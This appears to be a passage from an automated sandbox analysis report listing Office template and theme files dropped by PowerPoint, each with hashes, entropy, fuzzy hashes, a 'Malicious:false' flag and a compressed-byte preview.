                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):486596
                                                                                                                              Entropy (8bit):7.668294441507828
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                              MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                              SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                              SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                              SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):976001
                                                                                                                              Entropy (8bit):7.791956689344336
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                              MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                              SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                              SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                              SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1463634
                                                                                                                              Entropy (8bit):7.898382456989258
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                              MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                              SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                              SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                              SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2218943
                                                                                                                              Entropy (8bit):7.942378408801199
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                              MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                              SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                              SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                              SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2332136
                                                                                                                              Entropy (8bit):7.9547975506532795
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:5HQKNdoI77mfXP/mDZLGkkgrODG1MHKr4nNtOmtu0:5HNjoygXnm0jgrODhqrsNcmtu0
                                                                                                                              MD5:2AECC99B664F840799028A20703C3E21
                                                                                                                              SHA1:0018EAB0CE4900220607F4F80B506AA2F7F89C17
                                                                                                                              SHA-256:DF93F14304E35E460EEC7F8464AE2C2B0BFFA84D860D4857F41E0F07A3F023E3
                                                                                                                              SHA-512:E0BD3A86C7AF6B7202E8FBA42BCA27FBB17A21AC94A685A38C8A45F5AE35F350AE18D6B107F553DC95774FAE47F8BD8926F76DDD840BB7EB8E51E5CF2269AA1C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........fdlB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1750795
                                                                                                                              Entropy (8bit):7.892395931401988
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                              MD5:529795E0B55926752462CBF32C14E738
                                                                                                                              SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                              SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                              SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2924237
                                                                                                                              Entropy (8bit):7.970803022812704
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                              MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                              SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                              SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                              SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2357051
                                                                                                                              Entropy (8bit):7.929430745829162
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                              MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                              SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                              SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                              SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3611324
                                                                                                                              Entropy (8bit):7.965784120725206
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                              MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                              SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                              SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                              SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1091485
                                                                                                                              Entropy (8bit):7.906659368807194
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                              MD5:2192871A20313BEC581B277E405C6322
                                                                                                                              SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                              SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                              SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):608122
                                                                                                                              Entropy (8bit):7.729143855239127
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                              MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                              SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                              SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                              SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):857650
                                                                                                                              Entropy (8bit):7.84356939318248
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:RiQJnhBiU81d9WbQPHxV9uqraiDFihVRR5cJJeYiaFUV0CoTz:RiwhE8bIXkvQIjRR+nDmVK3
                                                                                                                              MD5:9A0B4CB63DD4E749EE4258F897FF42EE
                                                                                                                              SHA1:BD0F90AAD36C7DB69A57179B9702B13D8C83AABF
                                                                                                                              SHA-256:9C5471CD01C213E94E699E12331194370D8E3F4FC37776CAACDCF7CCB8949A2E
                                                                                                                              SHA-512:407AB455623FD3911E6B00CF0A23333979D7E29E7DFB0A759A3FF162B12894C843C51EFF6E1F99BB721851ABB122052ED7F141053FF4F5D955D7842B3600AA44
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK...........JE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK...........J.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2443359
                                                                                                                              Entropy (8bit):7.927032974390551
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:2HZkYR3gdOwBkskdDT+FQDGn5zpoLU0izCPOYZSKgdE6qFnm3DP+ulUnW:2jRkOlskJpDO5zpoKzZBKga6YmzWulUW
                                                                                                                              MD5:960696AF7BBDF3A98F282FD51A641797
                                                                                                                              SHA1:D884A5875C64C8F3B011E0754BEA633ACACEFBE6
                                                                                                                              SHA-256:CBFAC1EE697AB73485822088E25CEDB92D495B0B9423464CEBAC2FE3989212FC
                                                                                                                              SHA-512:9000DD85A0B2EBF5BE41D6C9785D69462D4D1B097D49CF2A57A432AB5D784BB9C95ECF1EB9F7CCC88D0CE47C580014E038D7A716FD1F8C094D2E6A1A42F3F0A3
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........k.JH...O...VP......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-q.......0..*!......R5/..Xu..C...5.{H.o/.2.....}.*.V..,..^.n.....c.K.....:...e...(.,..\YgE*.9,6a...b#.a.?..Li.tO?=._....%...`N.........{.j........u..\..9^h.T.<.$.<.#...p.V'......f..r.......Kggx...x....E...H.m.6.)._.2S...l....8..,.fHP}.M.......I.B....c.....4.......=ebN.R..Q=.~EN.*.4.x.v.........rf.8..Y..)g.3.3..g.O.e...7Q.B........L.7..v.6;..v....d....M.Z...ZkWC]k.".k.];u..K.Wk...>Wk.#..Z.| t.6tC}C...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7lJ..ZZ8.7rC}#...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7jJ..ZZ8.7vC}c...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7nJ..ZZ8.7qC}....}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7iJ..ZZ8.7uC}S...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7mJ..ZZ8.7sC}3...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7kJ..ZZ,..ztyJ.<}.2.e..._....PK.........k.J.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5783
                                                                                                                              Entropy (8bit):7.88616857639663
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                              MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                              SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                              SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                              SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4026
                                                                                                                              Entropy (8bit):7.809492693601857
                                                                                                                              Encrypted:false
